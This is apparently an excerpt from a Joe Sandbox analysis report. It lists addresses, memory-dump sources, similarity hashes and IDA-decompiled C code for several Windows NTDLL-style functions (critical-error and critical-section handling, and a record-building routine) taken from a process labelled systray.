0x00000000
0x045cd322
0x045cd322
0x045cd330
0x045cd337
0x045cd35d
0x045cd339
0x045cd33f
0x045cd38c
0x045cd38c
0x045cd33f
0x045cd349
0x00000000
0x045cd349

Strings

@, xrefs: 045CD303

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 51f9e49719f17723dabe1ffa3eba5fc4c5d14842e8fc0e6a844f5026d08f4b80
Instruction ID: 7d596a7b3892d642a2ba7ecd972ddb665ad3c78b5e6285de01816be7bc3b60d5
Opcode Fuzzy Hash: 51f9e49719f17723dabe1ffa3eba5fc4c5d14842e8fc0e6a844f5026d08f4b80
Instruction Fuzzy Hash: 223150B15087459FD321DF58D98096BBBF8FBC5A54F00092EB995C3250E638ED09EBD2

Uniqueness

Uniqueness Score: -1.00%

Function 04648DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E04648DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4670d50);
				E045ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04625720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L045EDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L045EDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E045ED130(_t34, _t39, _t40);
			}

0x04648df1
0x04648df1
0x04648df1
0x04648df1
0x04648df1
0x04648df1
0x04648df3
0x04648df8
0x04648dfd
0x04648e00
0x04648e0e
0x04648e2a
0x04648e36
0x04648e38
0x04648e3c
0x04648e46
0x04648e46
0x04648e36
0x04648e50
0x04648e56
0x04648e59
0x04648e5c
0x04648e60
0x04648e67
0x04648e6d
0x04648e73
0x04648e74
0x04648eb1
0x04648ebd

Strings

Critical error detected %lx, xrefs: 04648E21

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: cdd7a5d66bab823e163680945bdc8c1ee7823fa83b00265ba95598d062709b8a
Instruction ID: 1306abdf63cac18fe1fb34ab3402a39a87fea3024428ed0f91c9211063631dba
Opcode Fuzzy Hash: cdd7a5d66bab823e163680945bdc8c1ee7823fa83b00265ba95598d062709b8a
Instruction Fuzzy Hash: BD11AD75D00349EBEF28EFA585057ECBBB0BB84714F24421ED429AB381E3346606DF14

Uniqueness

Uniqueness Score: -1.00%

Function 0462FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0462FF60

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: ddec350cf2c139c0acb8977b371c3ee1bcba132fd8cb9dafbe2b82c71fd3e666
Instruction ID: 06ef7203ef63986ea9ddd70d7a6a379c8be11d938db5c27892341cdc1914d8be
Opcode Fuzzy Hash: ddec350cf2c139c0acb8977b371c3ee1bcba132fd8cb9dafbe2b82c71fd3e666
Instruction Fuzzy Hash: 3511E171950554FFEB1AEF50CA48FA87BB1FB48708F148048E5046B2A1E739B944EF50

Uniqueness

Uniqueness Score: -1.00%

Function 04665BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E04665BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4671178);
				E045ED0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04664C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E045DD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04665542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x46860e8;
								if( *0x46860e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x46860e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E045D9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E045D6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E045DF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E045DF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E045DF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E045DFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E045DFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E045DF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E045DF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04664CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E045ED130(_t427, _t494, _t511);
				}
			}

0x04665ba5
0x04665baa
0x04665baf
0x04665bb4
0x04665bb6
0x04665bbc
0x04665bbe
0x04665bc4
0x04665bcd
0x04665bd3
0x04665bd6
0x04665bdc
0x04665be0
0x04665be3
0x04665beb
0x04665bf2
0x04665bf8
0x04665bfe
0x04665c04
0x04665c0e
0x04665c18
0x04665c1f
0x04665c25
0x04665c2a
0x04665c2c
0x04665c32
0x04665c3a
0x04665c3f
0x04665c42
0x04665c48
0x04665c5b
0x04665c5b
0x04665c2c
0x04665cb7
0x04665cb9
0x04665cbf
0x04665cc2
0x04665cca
0x04665ccb
0x04665ccb
0x04665cd1
0x04665cd7
0x04665cda
0x04665ce1
0x04665ce4
0x04665ce7
0x04665ced
0x04665cf3
0x04665cf9
0x04665cff
0x04665d08
0x04665d0a
0x04665d0e
0x04665d10
0x00000000
0x00000000
0x04665d16
0x04665d1a
0x00000000
0x00000000
0x04665d20
0x04665d22
0x04665d25
0x04665d2f
0x04665d2f
0x04665d33
0x04665d3d
0x04665d49
0x04665d4b
0x00000000
0x00000000
0x04665d5a
0x04665d5d
0x04665d60
0x00000000
0x00000000
0x04665d66
0x04665d69
0x00000000
0x00000000
0x04665d6f
0x04665d6f
0x04665d73
0x04665d79
0x04665d7f
0x04665d86
0x04665d95
0x04665d98
0x04665dba
0x04665dcb
0x04665dce
0x04665dd3
0x04665dd6
0x04665dd8
0x04665de6
0x04665dec
0x04665dee
0x04665df1
0x04665df3
0x0466635a
0x0466635a
0x00000000
0x0466635a
0x04665dfe
0x04665e02
0x04665e05
0x04665e07
0x04665e10
0x04665e13
0x04665e1b
0x04665e1c
0x04665e21
0x04665e22
0x04665e23
0x04665e25
0x04665e2a
0x04665e2c
0x04665e2e
0x04665e36
0x04665e39
0x04665e42
0x04665e47
0x04665e4d
0x04665e54
0x04665e54
0x04665e54
0x04665e2e
0x04665e5c
0x04665e5f
0x04665e62
0x04665e64
0x04665e6b
0x04665e70
0x04665e7a
0x04665e7a
0x04665e7a
0x04665e6b
0x04665e7e
0x04665e7f
0x04665e7f
0x04665e81
0x04665e87
0x04665e8b
0x04665e8c
0x04665e8c
0x04665e8c
0x04665e9a
0x04665e9c
0x04665ea2
0x04665ea6
0x04665f50
0x04665f50
0x04665f57
0x04665f66
0x04665f66
0x04665f66
0x04665f68
0x04665f6a
0x046663d0
0x00000000
0x04665f70
0x04665f70
0x04665f91
0x04665f9c
0x04665f9e
0x04665fa4
0x04665fa6
0x0466638c
0x04666392
0x046663a1
0x046663a7
0x046663af
0x046663af
0x046663bd
0x046663d8
0x00000000
0x046663d8
0x04665fac
0x04665fb2
0x04665fb4
0x04665fbd
0x04665fc6
0x04665fce
0x04665fd4
0x04665fdc
0x04665fec
0x04665fed
0x04665fee
0x04665fef
0x04665ff9
0x04665ffa
0x04665ffb
0x04665ffc
0x04666000
0x04666004
0x04666012
0x04666012
0x04666018
0x04666019
0x0466601a
0x0466601b
0x0466601c
0x04666020
0x04666059
0x0466605c
0x04666061
0x04666061
0x04666022
0x04666022
0x04666022
0x04666025
0x0466602a
0x0466602b
0x04666031
0x04666037
0x04666038
0x0466603e
0x04666048
0x04666049
0x0466604a
0x0466604b
0x0466604c
0x0466604d
0x04666053
0x04666054
0x04666054
0x04666062
0x04666065
0x04666067
0x0466606a
0x04666070
0x04666075
0x04666076
0x04666081
0x04666087
0x04666095
0x04666099
0x0466609e
0x046660a4
0x046660ae
0x046660b0
0x046660b3
0x046660b6
0x046660b8
0x046660ba
0x046660ba
0x046660ba
0x046660ba
0x046660be
0x046660c0
0x046660c5
0x046660c5
0x046660c5
0x046660c6
0x046660cd
0x04666114
0x046660cf
0x046660cf
0x046660d4
0x046660d5
0x046660da
0x046660db
0x046660e1
0x046660e2
0x046660e8
0x046660f8
0x046660fd
0x046660fe
0x04666102
0x04666104
0x04666107
0x04666109
0x0466610b
0x0466610b
0x0466610b
0x0466610b
0x0466610f
0x0466610f
0x04666117
0x0466611a
0x0466611f
0x04666125
0x04666134
0x04666139
0x0466613f
0x04666146
0x04666148
0x0466614b
0x0466614d
0x0466614f
0x0466614f
0x0466614f
0x0466614f
0x04666153
0x04666159
0x04666159
0x0466615c
0x04666163
0x04666169
0x0466616c
0x04666172
0x04666181
0x04666186
0x04666187
0x0466618b
0x04666191
0x04666195
0x046661a3
0x046661bb
0x046661c0
0x046661c3
0x046661cc
0x046661d0
0x046661dc
0x046661de
0x046661e1
0x046661e4
0x046661e6
0x046661e8
0x046661e8
0x046661e8
0x046661e8
0x046661e6
0x046661ec
0x046661f3
0x04666203
0x04666209
0x0466620a
0x04666216
0x0466621d
0x04666227
0x04666241
0x04666246
0x0466624c
0x04666257
0x04666259
0x0466625c
0x0466625e
